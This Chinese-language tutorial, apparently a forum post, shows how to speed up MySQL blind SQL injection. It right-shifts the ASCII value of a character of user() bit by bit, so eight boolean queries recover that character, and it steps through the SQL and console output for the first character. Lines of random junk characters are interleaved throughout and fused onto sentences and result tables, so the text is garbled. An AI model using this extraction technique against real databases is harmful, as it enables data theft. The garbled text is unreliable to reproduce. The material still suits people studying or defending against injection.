关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位

7 W0 j. u1 G/ [$ c) E
8 p$ X7 G( R& g6 Q" t
下面将以查询mysql数据库当中user()的第一位为例:

+ x- u# ]% h; A5 {% y

9 m4 R" `1 c# p4 s9 l1 `ps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)
7 W' a4 ]; ^1 F, |3 w) h
4 s4 j- D; k1 {! J! P. n' f* D

首先执行如下sql语句:
  M0 i7 a8 q; G) h" T. F


mysql> select (ascii((substr(user(),1,1))) >> 7)=0;
" S8 w& Z0 i9 F0 H# ~
2 e+ M1 e; o) q) E: y  f0 O; {1 [+ Q

0 F7 `* d7 b$ x. c7 c我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的
8 M) X3 D5 i8 ^: S1 H
) F; R  C  _, K8 C" I9 p. ^6 K$ e

7 \) ?# X2 r) z' I" D第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1
. ?4 E2 U* h  R( ^7 Y; |# M
7 X+ l& j8 e( g: X7 _2 k5 I4 b% o3 S
0 K  E) V1 a+ c, d" m8 `; C
如果运算结果为1,说明第一位为0,不为1

5 ]7 o2 P  \6 `# L; ~
5 [5 B3 t5 ?  Q8 e
% \( R1 \  h+ Y. i+ M. e, W0 U+————————————–+
( h6 g! _8 i% E' w) E6 |
  ~# o2 c( U' [+ w9 C% ]9 }| (ascii((substr(user(),1,1))) >> 7)=0 |

+————————————–+
/ v3 _6 b4 n. K0 C- J# M
| 1 |
- j, Q3 `* y  t1 [0 O9 O
5 Y( g, ~8 Z+ w2 K2 h* Y+————————————–+

1 row in set (0.00 sec)

这样我们就确定这个8bit的ascii的第一位为0
- p+ d& d2 L  M/ ?- N" y9 K0 G
& x/ i# I% h% G2 Q0 P2 P
2 Y9 y3 c2 }7 ^9 ?. X6 K: r' Q
) J0 D0 z" Y) K7 n第二次我们来做6次右偏移来确定前两位
$ h/ ?1 ~' G/ A, [+ D0 T* b
4 [* |  y4 C' F; S/ s

前两位可能是01或00,即依然可以与0做比较,

' _# `$ W. p$ G6 Z: e3 Y# Tmysql> select (ascii((substr(user(),1,1))) >> 6)=0;
2 |5 h9 j: S) D. p0 |' q
+————————————–+

| (ascii((substr(user(),1,1))) >> 6)=0 |

7 E' I6 G9 H; `6 m( E4 p% x+ C+ l4 c+————————————–+

| 0 |

7 ~. k2 i( @' v/ v) S, ?+————————————–+
2 W  V! F/ L, b4 \
0 N: _" ]2 g, f( a5 F1 row in set (0.00 sec)

' u. R( C2 g! Y  h) x1 S8 M, q* a& i

结果为0,即第二位为1
% d0 t) t8 b- u7 O7 {, |" k! E
0 a) w7 L2 D' f3 o5 i6 y
* g" ~5 S- m. n! c1 b
( r; V# h. _( S! z2 S% n  c开始猜测前三位为010或011

) O3 z, _; S9 T- A/ |) x: w

% x+ o# f- D9 p8 J- Q" a* y" u让我们看看010和011的ascii码是多少
6 e6 a3 I/ [' Y0 I0 Z


分别查询select b’011′ select b’010′
; l+ h2 \) @0 p
5 D+ I% ~' N6 g( E' x

获得结果 010 = 2 011 = 3
& D: Y0 T' o, O) o$ ?: i


执行如下sql:
4 O: x3 B  `( j0 m% q- q3 F' m
' u! Q, c5 N$ z& g0 j

0 p2 Z. K3 L% G+ `mysql> select (ascii((substr(user(),1,1))) >> 5)=2;

  {- s" U" B+ A9 n3 v+————————————–+

* ~. H/ z( N6 Z! o% n8 o| (ascii((substr(user(),1,1))) >> 5)=2 |

& y! I2 n! P' z5 f3 P" s, Y+————————————–+
" U" V0 ?, R0 r& r
2 ?1 F8 S+ ]7 ?# Z| 0 |

- L5 O' r* A+ W' R& a7 @+————————————–+

即前三位不为010,而是011

, N+ Y  N: G2 J! ]# }/ u5 W

- p8 f2 |. L6 h' l: b$ t直到获得最后一位
9 x3 ~- S4 X/ t
4 P4 q( @& S/ _& Q8 ?+ d
3 F' q0 V! m4 \0 Z0 P$ o
最终结果为:01110010
: ?, a) @/ v6 g$ d+ F5 J$ z
6 T% h0 ^1 D# f1 Z
( f0 w( Q+ }8 ]( b& @, l- Y4 ?$ n
, g: a2 f" B) b4 d1 }转换一下:
3 x8 G' |( `; d3 b, \: W2 @

2 i' T( P& B$ N. d, S' W
: V* l8 ?" n+ j  cselect b’01110010′
8 g; c* \9 g( a
. s0 S- b! X4 ?" {- T
6 o( J- o- j: w, f9 K
% A0 P% U# R2 h. \" a7 ^4 D查询结果


5 l1 Q" t6 ]( y1 Q- L0 o" T$ n
! v, n. {) T, n- s! N% g+————-+
7 f$ t+ E3 `7 ~  v7 j' u
: \0 K9 l; E, h3 W" x6 z) i| b’01110010′ |
6 |  |. F. L; u. A5 e  ?% u2 l6 X5 R
+————-+

| r |
- M! }& M0 a* v$ k
+————-+
; ?3 y7 v+ y! Q9 T) C; m
1 row in set (0.00 sec)



3 [4 ?$ E" O+ y: d3 R+ M这样我们就获得了user()的第一位.其它位依此类推
& D3 ?) s$ M$ p; |5 |9 H8 ]( x